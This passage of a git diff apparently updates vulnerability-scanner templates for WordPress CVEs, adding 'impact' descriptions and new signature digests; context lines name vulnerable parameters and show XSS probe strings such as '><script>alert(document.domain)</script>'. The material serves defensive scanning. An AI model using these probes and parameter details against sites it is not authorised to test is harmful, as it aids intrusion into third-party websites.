+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update WordPress Pro Real Estate 7 Theme to version 3.1.1 or later to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100edb7de31a26ed2949511ebe6a7e12d6a65992ff50ae5ae1bfa37ae1ef619155602200c4554f058ca652659205ac856dcf6f0ab576c3a52272297154f12e8d081a482:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210094c5eaad028b35aa663c99640662927597cfd452c05c549f2771bc24c49db907022100a469ba3b64b1b94ca5299f7dd473385edf7da880b0d6b63819f15554e7aaf08b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml
index 267d766927..dfa5b538f1 100644
--- a/http/cves/2021/CVE-2021-24389.yaml
+++ b/http/cves/2021/CVE-2021-24389.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the WordPress FoodBakery plugin to version 2.2 or later to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206c69ca8068d23b3e7eeb663d3dcf778a2c5940c810fd620f2e788ba7b1c3a514022100f733fa6d9cc68ba67b4ac4245966040433f774ab551fd345ca44ec2d8a1a3452:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203e01e1ddae892b88649f4137a904a03a41c8976ef3b08a4b380690b2b91d80be022100b9d9ba1b6c227dac482bae412855ab7723e3420f08c5078f4e4c9bcb99ef3465:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml
index 0ec10df3db..4bade2d715 100644
--- a/http/cves/2021/CVE-2021-24406.yaml
+++ b/http/cves/2021/CVE-2021-24406.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.
+  impact: |
+    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
   remediation: |
     Update wpForo Forum to version 1.9.7 or later to fix the open redirect vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a00473045022100979b05b137ed49142e899fbb029c94ad0fc746f5d79712def2e4960be985396702207b71a1d336c9f3506da04ccb69de9ed4bc08892bfcf2495bdc02961a51b51acc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200876c700b32c73ac2dfbdbc977d041cc727a0a1faf26e159755c5e5f7457a78a0220583d8bb7b89000aa2dc94a28c1eb705fbd1134316359286e1f1fc7e9bbf691b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml
index 0d8356d852..a755f41ec5 100644
--- a/http/cves/2021/CVE-2021-24407.yaml
+++ b/http/cves/2021/CVE-2021-24407.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update the Jannah Theme to version 5.4.5 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022036ed611bd9316deb2f6487e2de2f78f8e761cfabbd8e0d9f2fb4e6adcee66d170221008889f6e238fae27f55e8ef013c854524cc3708ab5e6285e3a85d66a2f05b1559:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203c4b081bb6d038e37e1f10cd9a65b6f82906a53f04de303a83d32caa4329119602206ceb85da07a961d144008a28f8ef420d5c49d5d191e13691c2e4572fd60da280:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml
index 6365668004..a2a040a9ea 100644
--- a/http/cves/2021/CVE-2021-24409.yaml
+++ b/http/cves/2021/CVE-2021-24409.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.
   remediation: Fixed in version 2.8
   reference:
     - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "Leave A Review?")'
           - 'contains(body_2, "onanimationend=alert(document.domain)")'
         condition: and
-# digest: 4b0a00483046022100c177cba8388335c6c6cb3a97f7bb462631c7f502e3c5a8e279dc3bc1ec545aeb022100cdecff0a653f57c804f1251a79f68ecfdb8255e75c504a404b15fb31ce6c65d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c28d21b6daab9cd7d15df481b9103bf137cdb3a48fba88b5bdaaed9ae41d7bd0022100d66f974a39bdc26649c0ab24620e08fcf2d6e34b173ebd74ff47f969bca397c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml
index 3f02a24b85..1e44c53b93 100644
--- a/http/cves/2021/CVE-2021-24435.yaml
+++ b/http/cves/2021/CVE-2021-24435.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 2.7.12
   reference:
     - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220081375e538f39ed7b15bd56766a0caed640e127c09d278d5b00b3d79ed51ab9c0221009e7ba2f2a24da216be3bf4a57d16db35a216c68183b1c37dc86fedc4733a2e9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022009b968d2a1da76df574f340767fcf01b9c648333fb6c07c37dd55871d96137a502203bf3d626ac0a2c93bc99b8d3ff61ebc2c4d958aac85e07110529ef08c72917f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml
index 3d2ae97413..bd0a199922 100644
--- a/http/cves/2021/CVE-2021-24436.yaml
+++ b/http/cves/2021/CVE-2021-24436.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 2.1.4.
   reference:
     - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
@@ -47,4 +49,4 @@ http:
           - contains(body_2, '><script>alert(document.domain)</script>&action=view')
           - contains(header_2, "text/html")
         condition: and
-# digest: 4b0a004830460221009e0b79e0dd66aa05d05d2b6c4f474557cc7c8afbec518786719eac8369d6b9b4022100b0d8230f2f42554609714a9fc7c62890a1081da02d8ab5ca40cc473d12604a1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207a0dd0aeb174592c7d595d949388a66c45f35baee6d8be49e759046f481a4451022057fe0983d4e398e2ed688305f0f5b6a11f9577833b5afc07f651fad1a26e0156:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml
index 7a9c83b1b7..0354ee535b 100644
--- a/http/cves/2021/CVE-2021-24452.yaml
+++ b/http/cves/2021/CVE-2021-24452.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 2.1.5.
   reference:
     - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
@@ -46,4 +48,4 @@ http:
           - contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache')
           - contains(header_2, "text/html")
         condition: and
-# digest: 4a0a0047304502202367919bebaa1ea4652954e06c554ec5825295932082fbb9d72afd1f5e24c0c2022100bca63be5ed75002dd2de5915ac1db5a757199fa25653aebb131f3005154259c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ee0a4c5869e93986fa48218f6c1e591682109a5c59176f61403b7251dab0c15d022100d6c40273b325bfd8e90829dd779d8483de3b418a76db9adf5e53209f99f0e85b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml
index 6ec5967a3b..f2107d2801 100644
--- a/http/cves/2021/CVE-2021-24472.yaml
+++ b/http/cves/2021/CVE-2021-24472.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2  have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.
+  impact: |
+    Remote File Inclusion/Server-Side Request Forgery vulnerability allows an attacker to include arbitrary files or make requests to internal resources, leading to potential data leakage, unauthorized access.
   remediation: |
     Update Onair2 to version 3.9.9.2 or higher and KenthaRadio to version 2.0.2 or higher to mitigate the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204721e14e32db2fc8cc75d9340e4a534374d182cb6eb99660983889fe1c991392022100d2c936d18888e82a6aa9746ad17458f7e12db7b1294a9c4d93900546967437d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b5fd3df9739d79fc77b67211c436693d91061fe4bd30558677eb0b66c6cb7c00022012b8f638eea1650509a59beef8e73307a42c721ecb3a831ae9902dbc71741e68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml
index e5baf217b8..2cd5434fef 100644
--- a/http/cves/2021/CVE-2021-24488.yaml
+++ b/http/cves/2021/CVE-2021-24488.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: medium
   description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Post Grid plugin (2.1.8 or higher) to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202e5ae6eaa97e679e96f30d4081899b0a4c4cd1980c1dca473fd92a166b5b37d70220119da2388897960be5cbfb40e09ce40099de754771ccd4758c61e09c10eb0acd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd27582dc3e1e079f762d7129d49660e6991c4e0e772cd5c09c65d1076b879100220725a93c579814e052e8b598d22e7785918d99faa3abd4b2999340e7dac26f497:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml
index e569de78ef..a4f48d5765 100644
--- a/http/cves/2021/CVE-2021-24495.yaml
+++ b/http/cves/2021/CVE-2021-24495.yaml
@@ -5,6 +5,8 @@ info:
   author: johnjhacking
   severity: medium
   description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100928aca9640db5b5f19382c73fcc52e4d5d70e5b99f6b76ddd1815a9a43d68a6b02203db6a9e9e83ffea33c01d21cc7383ece7519025c9475f02a72db8249dd5f7217:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207c9630675eaaf0cd6ff3ec83352952d711643aedd2f2bfbb84301cad08c033f0022100b6dda77c0082db4a962af7a80d8860df21786b517825e80957d4e44b39d33f23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml
index bc91a0496b..91205c5741 100644
--- a/http/cves/2021/CVE-2021-24498.yaml
+++ b/http/cves/2021/CVE-2021-24498.yaml
@@ -5,6 +5,8 @@ info:
   author: suman_kar
   severity: medium
   description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the WordPress Calendar Event Multi View plugin to version 1.4.01 or later to mitigate the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c13fba049fa5e41949a7094f0d6ed223bcd8b446124cffdf27a036186b24bf99022100f389c69b9f2fa3c52e234ae130599a7db02a1efa851d77e647e8458723c1ce8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ebbf21f5e0b617526916b1744dac4e57ea624a33c979c9da926bc2a14c2dc9eb022100b3e3eadd094462a714ea670c8afc0450a06d6da0b25505b3a677f045f3f0a58e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml
index e71dc2aa48..f0a88fe077 100644
--- a/http/cves/2021/CVE-2021-24499.yaml
+++ b/http/cves/2021/CVE-2021-24499.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
   remediation: |
     Update to the latest version of the Workreap plugin to fix the vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201124a337eb5d6323a91e6853ebc2018aad91473a8e532192070b8c11af1d29e20221009625d0dbbe65e1e374c730846a2f2a65d5e7b22d418a38dff1ad0213133835f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c58c0ad05e7135761951130061ddebbc268edf3f54404ce5a04c8cebd217a32902202a3d3a71c382a75e19efd917a29b1c50fdffb1beb6a2eed1fb99b16b573ffd68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml
index 0393727c27..ebfc155df4 100644
--- a/http/cves/2021/CVE-2021-24510.yaml
+++ b/http/cves/2021/CVE-2021-24510.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of WordPress MF Gig Calendar plugin (>=1.2) which includes proper input sanitization and validation.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fa4d0fe4f0742e8a2c9d6329f1fb1174d7defea3ff02c72ef5d4ea654fdf5663022100d92a38a8dc97bcf998c507662294951f1261b8e92becb680a76a650cc2abc85a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b9df88f8fb4962ee5353f02e7c0dc690f662e2e0c499015bb8b3d2fb745cc12f022100d70ac2dc74f1ec9ab18127f51986f534bc4d14f6854429090eea04c4d68519d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml
index 585eb95545..a29b6f5e31 100644
--- a/http/cves/2021/CVE-2021-24554.yaml
+++ b/http/cves/2021/CVE-2021-24554.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")'
         condition: and
-# digest: 490a0046304402202e80ea577bd7a0a41976cbf27065e733f7493916f873bddbe9df49e7b6cd2691022061c16549862d01bca38c7cbb5bf73bd58f03cf79e20b0b63121efa148780b659:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204e810acd67c219fbf9bd92ab9239a06d88f9f8c6ea3878026da7af8430a1b30902206887c64e2607bd09b58fbbe38ba774b87fe69293d974e36d91197686fca359a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml
index 2fef21dfbb..4fb80bb8ec 100644
--- a/http/cves/2021/CVE-2021-24647.yaml
+++ b/http/cves/2021/CVE-2021-24647.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The Registration Forms  User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username
+  impact: |
+    An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information.
   remediation: Fixed in version 3.7.1.6
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24647
@@ -50,4 +52,4 @@ http:
           - 'contains(body_1, "pieregister")'
           - 'contains(body_3, "Username") && contains(body_3, "email-description")'
         condition: and
-# digest: 4b0a00483046022100ff1abdb35d292c1b64a40299639eeaa7c2f8c75f49e3cc7338df153cfb5c58b6022100acbc74f4bb1efa0f788c2c075f075871b68f406bf6d369f0c232b77999831a4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200a6098cf64961a4a285cd7e2785a4a58dc998aa5493fd23ea9f3f3dbc91868e9022036ae293ca6557c2b89e30c47c3f2d6121e4c7de193531a8f72bf1915bc5a76bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml
index 9934582a44..0f3ba9d6ce 100644
--- a/http/cves/2021/CVE-2021-24666.yaml
+++ b/http/cves/2021/CVE-2021-24666.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P<id>[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: Fixed in version 3.5.6.
   reference:
     - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009a6301a6505be5361b48b00935baaef1fd72e738e5a70d1677769bc0a4cafb9d02202ccdd9669c4f97ea91202400c3b4def8eac954fc61b05cded34c20c07747df41:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d5b062983c0c71169d1957d15f9216cab25cf78722f632c6413b34ca2e1eb0b2022062f6b83e19d85031d94954fc377cbefa7bf3d8e6927bef29c6291a692a429d35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml
index 7f114a6610..b2039930c6 100644
--- a/http/cves/2021/CVE-2021-24731.yaml
+++ b/http/cves/2021/CVE-2021-24731.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version 3.7.1.6
   reference:
     - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "User credentials are invalid.")'
         condition: and
-# digest: 4a0a0047304502203fdc620d1e41ae4de60cba83d01ac7d18b4b7a214b5b01d52befabe1f25a1ce80221008537eea3461c017fff422cb515e2f48806a70023bafb9f415bd776533f7bb8c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b402c6eab0fb7af37419c25fc74e63137e4f6a325e34d9e939c8dbdf268adaf402207d0101254e8a78d0086dfa57dc7d67a3d55373a12bdc46baec27b8404ac4cfab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml
index ec59020da6..97ddc32717 100644
--- a/http/cves/2021/CVE-2021-24746.yaml
+++ b/http/cves/2021/CVE-2021-24746.yaml
@@ -5,6 +5,8 @@ info:
   author: Supras
   severity: medium
   description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
           - '"slug":"([_a-z-A-Z0-9]+)",'
         internal: true
         part: body
-# digest: 4a0a00473045022032a90f014073062b152dc0b1dd0007b2550f6aef89789d7706589ed1fc37d6c5022100e24e29303c6abe27c14325ea2a84a205625c849cadb7c4c3b7ac8c74cd754499:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022068e81841b1d67cf49af45fd41356db286199ed198cc9d62da154d6f0c1ab1e25022100f2936095e3913e6a2ab9c3da20495d2079b253d3be03afc113f693a73d224f80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml
index a9ee7b41e2..5b36c85689 100644
--- a/http/cves/2021/CVE-2021-24750.yaml
+++ b/http/cves/2021/CVE-2021-24750.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuakilong
   severity: high
   description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a201122d73c7cc14db572edfa504d3277d6a5d633078bbf6926b7bc7ae32b1bc022100cad98593b6e7f6358b79c661ad16d5a43667c67523ffc31e015c056b48386f97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a7fb547cf1986ffd572d703fc3197ecc538d8959f7137519f005c04e07b5c5dd02201fa67c6ca150cf4a02583beee740e5ff2d0ace5f3f575a57e2394462ef2d8fcd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml
index 696d143845..7b928da7d8 100644
--- a/http/cves/2021/CVE-2021-24762.yaml
+++ b/http/cves/2021/CVE-2021-24762.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
   remediation: |
     Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4b0a0048304602210087096f033f037a2f32a2e577c0d261a05cc43cc63035997a9245a91df7eb44d7022100b2f03bc2bda8fe1a0cea85a6455ad2b74f5281b04403aaf3593389e09c1ab71a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207669667d5fd7c405664c4944e8e718f12b818e2f2fdbe9b63bf8ce97f5390402022100c618ff23732a6da88e9631379ea1b3c5bf9a0b937330254454be5197d1113cc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml
index f05d0cf797..b8a306abf7 100644
--- a/http/cves/2021/CVE-2021-24827.yaml
+++ b/http/cves/2021/CVE-2021-24827.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "asgarosforum")'
         condition: and
-# digest: 4a0a00473045022100ffdeda13ed59a083aa4126d367a641e31cdfabcbf4e8a0da7fb89732e3097faa02201e6a53925ea3075f49f1b03a1e1e817eea3951ab29627e3e8e0e9fd9d882bbca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202c3b01ead3fa254929f367eb0f70163d7eda58659c802d831a97acc6837973bd022100f1a61df6b07e1b2c22b4139ca65a4d171328d598984905bc5a32d03752585a36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml
